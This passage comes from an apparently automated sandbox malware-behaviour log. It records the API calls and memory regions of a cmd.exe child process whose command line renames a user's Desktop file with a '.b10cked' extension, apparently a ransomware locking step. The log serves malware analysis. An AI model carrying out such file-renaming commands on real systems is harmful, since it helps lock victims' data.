| out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0231.608] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e90c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e90c*=0x1a) returned 1 [0231.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.609] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.609] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.609] SetConsoleInputExeNameW () returned 0x1 [0231.609] GetConsoleOutputCP () returned 0x1b5 [0231.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.609] exit (_Code=0) Process: id = "610" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b20" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34378 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34379 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34383 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34567 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34568 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34569 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34570 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 34571 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 34572 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34573 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34574 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34575 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34576 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34577 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34578 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34579 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34580 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34679 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 34680 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34681 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34682 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34683 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34684 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 34685 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34686 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 34687 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 34688 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 848 os_tid = 0xf98 [0231.843] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16feec | out: lpSystemTimeAsFileTime=0x16feec*(dwLowDateTime=0xbdbf5a40, dwHighDateTime=0x1d440a9)) [0231.843] GetCurrentProcessId () returned 0x930 [0231.843] GetCurrentThreadId () returned 0xf98 [0231.843] GetTickCount () returned 0x3fcc5 [0231.843] QueryPerformanceCounter (in: lpPerformanceCount=0x16fee4 | out: lpPerformanceCount=0x16fee4*=28863254111) returned 1 [0231.844] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.844] __set_app_type (_Type=0x1) [0231.844] __p__fmode () returned 0x76b331f4 [0231.844] __p__commode () returned 0x76b331fc [0231.844] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.844] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.845] GetCurrentThreadId () returned 0xf98 [0231.845] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf98) returned 0x38 [0231.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.845] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.845] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.920] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.920] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fe7c | out: phkResult=0x16fe7c*=0x0) returned 0x2 [0231.920] VirtualQuery (in: lpAddress=0x16feb3, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.920] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fe4c, dwLength=0x1c | out: lpBuffer=0x16fe4c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.920] GetConsoleOutputCP () returned 0x1b5 [0231.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.923] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.923] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.923] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.931] GetEnvironmentStringsW () returned 0x280168* [0231.931] FreeEnvironmentStringsW (penv=0x280168) returned 1 [0231.931] GetEnvironmentStringsW () returned 0x280168* [0231.931] FreeEnvironmentStringsW (penv=0x280168) returned 1 [0231.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edec | out: phkResult=0x16edec*=0x40) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x90, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x0, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegCloseKey (hKey=0x40) returned 0x0 [0231.932] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edec | out: phkResult=0x16edec*=0x40) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x40, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x1, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x0, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x4, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x4) returned 0x0 [0231.932] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edf4, lpData=0x16edf8, lpcbData=0x16edf0*=0x1000 | out: lpType=0x16edf4*=0x0, lpData=0x16edf8*=0x9, lpcbData=0x16edf0*=0x1000) returned 0x2 [0231.932] RegCloseKey (hKey=0x40) returned 0x0 [0231.932] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.932] srand (_Seed=0x5b8863bf) [0231.932] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" [0231.932] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"" [0231.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.933] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.933] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.933] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.933] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.933] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.933] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.933] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.933] GetEnvironmentStringsW () returned 0x2822b8* [0231.933] FreeEnvironmentStringsW (penv=0x2822b8) returned 1 [0231.933] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.933] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.933] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.933] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.934] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.934] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.934] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.934] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.934] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.934] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.934] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fbb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.934] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fbb8, lpFilePart=0x16fbb4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fbb4*="Desktop") returned 0x18 [0231.934] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.934] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.934] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.935] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.935] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.935] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.935] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.935] GetEnvironmentStringsW () returned 0x282ad8* [0231.935] FreeEnvironmentStringsW (penv=0x282ad8) returned 1 [0231.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.936] GetConsoleOutputCP () returned 0x1b5 [0231.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.977] GetUserDefaultLCID () returned 0x409 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="0") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="0") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="1") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.981] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.982] GetConsoleTitleW (in: lpConsoleTitle=0x2708d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.998] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.999] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.999] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.000] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.000] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.000] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.000] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.000] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.000] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.000] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.005] GetConsoleTitleW (in: lpConsoleTitle=0x16f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.047] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.047] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.047] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.047] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.047] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.047] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.047] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.047] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.047] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.047] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.048] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.048] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.048] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.048] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.048] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.048] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.048] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.048] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.048] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.048] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.048] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.048] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.048] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.050] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f7ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f7a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: 